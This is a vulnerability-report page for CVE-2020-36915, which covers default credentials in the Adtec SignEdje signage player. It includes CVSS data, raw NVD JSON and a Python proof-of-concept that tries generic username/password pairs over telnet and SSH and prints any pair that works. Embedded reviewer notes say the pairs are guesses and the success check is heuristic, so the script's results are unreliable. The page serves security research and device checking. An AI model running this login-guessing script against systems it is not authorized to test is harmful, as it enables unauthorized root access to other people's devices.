Security Vulnerability Report
CVE-2020-36915 CVSS 7.5 HIGH

CVE-2020-36915

Published: 2026-01-06 16:15:48
Last Modified: 2026-04-15 00:35:42

Description

Adtec Digital SignEdje Digital Signage Player v2.08.28 contains multiple hardcoded default credentials that allow unauthenticated remote access to web, telnet, and SSH interfaces. Attackers can exploit these credentials to gain root-level access and execute system commands across multiple Adtec Digital product versions.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Adtec Digital SignEdje Digital Signage Player v2.08.28及更早版本
其他Adtec Digital产品受影响的版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
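#!/usr/bin/env python3
# CVE-2020-36915 PoC - Adtec Digital SignEdje Default Credentials
# Note: This is for educational and authorized testing purposes only
#
# Reviewer notes:
# - The credential pairs below look like generic guesses. Nothing on this
#   page shows that they match the accounts documented in the referenced
#   advisories, so a negative result does NOT show a device is unaffected.
# - The CVE description also names the web interface; this script only
#   checks telnet and SSH.
# - A positive result means the device accepts a well-known password over
#   the network: change or disable that account and restrict access to the
#   management interfaces.
# - telnetlib was removed from the standard library in Python 3.13, and
#   paramiko is a third-party package that must be installed separately.

import socket
import sys
import telnetlib
from paramiko import SSHClient, AutoAddPolicy


def check_telnet_default_credentials(target_ip, port=23):
    """Check whether the telnet service accepts one of a few common logins.

    Args:
        target_ip: Address of the device under test.
        port: Telnet port to probe (default 23).

    Returns:
        True as soon as one username/password pair appears to yield a shell
        prompt; False if the port is closed, no pair is accepted, or an
        error occurs.
    """
    default_creds = [
        ('admin', 'admin'),
        ('root', 'root'),
        ('admin', 'password'),
        ('root', 'password'),
        ('admin', '1234'),
        ('root', '12345'),
    ]

    try:
        # Close the probe socket before any login attempt. The original left
        # it open (a descriptor leak), and a device that allows only one
        # telnet session would have refused the login connections below.
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            sock.settimeout(10)
            port_open = sock.connect_ex((target_ip, port)) == 0

        if not port_open:
            return False

        print(f"[+] Telnet port {port} is open on {target_ip}")

        for username, password in default_creds:
            try:
                # The context manager closes the session on every path.
                with telnetlib.Telnet(target_ip, port, timeout=10) as tn:
                    tn.read_until(b'login: ', timeout=5)
                    tn.write(username.encode('ascii') + b'\n')
                    tn.read_until(b'Password: ', timeout=5)
                    tn.write(password.encode('ascii') + b'\n')
                    reply = tn.read_until(b'#', timeout=5)

                # NOTE(review): this is a heuristic. Any reply containing
                # '#' or '$' (for example inside a banner) is reported as a
                # successful login; confirm a hit manually.
                if b'#' in reply or b'$' in reply:
                    # The output contains the matching pair in clear text;
                    # treat saved output as sensitive.
                    print(f"[+] SUCCESS: Default credentials found - {username}:{password}")
                    return True
            except Exception:
                # Was a bare `except:`, which also swallowed
                # KeyboardInterrupt and SystemExit and made the loop
                # impossible to interrupt.
                continue

        return False
    except Exception as e:
        print(f"[-] Error: {e}")
        return False


def check_ssh_default_credentials(target_ip, port=22):
    """Check whether the SSH service accepts one of a few common logins.

    Args:
        target_ip: Address of the device under test.
        port: SSH port to probe (default 22).

    Returns:
        True as soon as one username/password pair authenticates; False if
        the port is closed, no pair is accepted, or an error occurs.
    """
    default_creds = [
        ('admin', 'admin'),
        ('root', 'root'),
        ('admin', 'password'),
    ]

    try:
        # Release the probe socket before authenticating (see telnet check).
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            sock.settimeout(10)
            port_open = sock.connect_ex((target_ip, port)) == 0

        if not port_open:
            return False

        print(f"[+] SSH port {port} is open on {target_ip}")

        for username, password in default_creds:
            client = SSHClient()
            try:
                # AutoAddPolicy accepts whatever host key the peer presents,
                # so a result says nothing about which host answered.
                client.set_missing_host_key_policy(AutoAddPolicy())
                client.connect(target_ip, port=port, username=username,
                               password=password, timeout=10)
                print(f"[+] SUCCESS: Default SSH credentials found - {username}:{password}")
                return True
            except Exception:
                # Narrowed from a bare `except:` so Ctrl-C still works.
                continue
            finally:
                # The original never closed the client, leaving the
                # authenticated session and its transport thread alive.
                client.close()

        return False
    except Exception as e:
        print(f"[-] Error: {e}")
        return False


def main():
    """Run the telnet and SSH checks against the address given in argv[1]."""
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_ip>")
        print(f"Example: {sys.argv[0]} 192.168.1.100")
        sys.exit(1)

    target_ip = sys.argv[1]

    print(f"[*] Scanning {target_ip} for CVE-2020-36915 vulnerability...")

    # The return values are not used: results are reported only through the
    # messages printed by each check, and the exit status is always 0.
    check_telnet_default_credentials(target_ip)
    check_ssh_default_credentials(target_ip)

    print("[*] Scan complete")


if __name__ == '__main__':
    main()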

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2020-36915", "sourceIdentifier": "[email protected]", "published": "2026-01-06T16:15:47.550", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Adtec Digital SignEdje Digital Signage Player v2.08.28 contains multiple hardcoded default credentials that allow unauthenticated remote access to web, telnet, and SSH interfaces. Attackers can exploit these credentials to gain root-level access and execute system commands across multiple Adtec Digital product versions."}, {"lang": "es", "value": "Adtec Digital SignEdje Digital Signage Player v2.08.28 contiene múltiples credenciales predeterminadas codificadas que permiten acceso remoto no autenticado a las interfaces web, telnet y SSH. Los atacantes pueden explotar estas credenciales para obtener acceso a nivel de root y ejecutar comandos del sistema en múltiples versiones de productos de Adtec Digital."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", 
"modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-798"}, {"lang": "en", "value": "CWE-1392"}]}], "references": [{"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/190628", "source": "[email protected]"}, {"url": "https://packetstorm.news/files/id/159709", "source": "[email protected]"}, {"url": "https://www.adtecdigital.com", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/48954", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/adtec-digital-signedje-digital-signage-player-default-credentials", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5603.php", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/48954", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}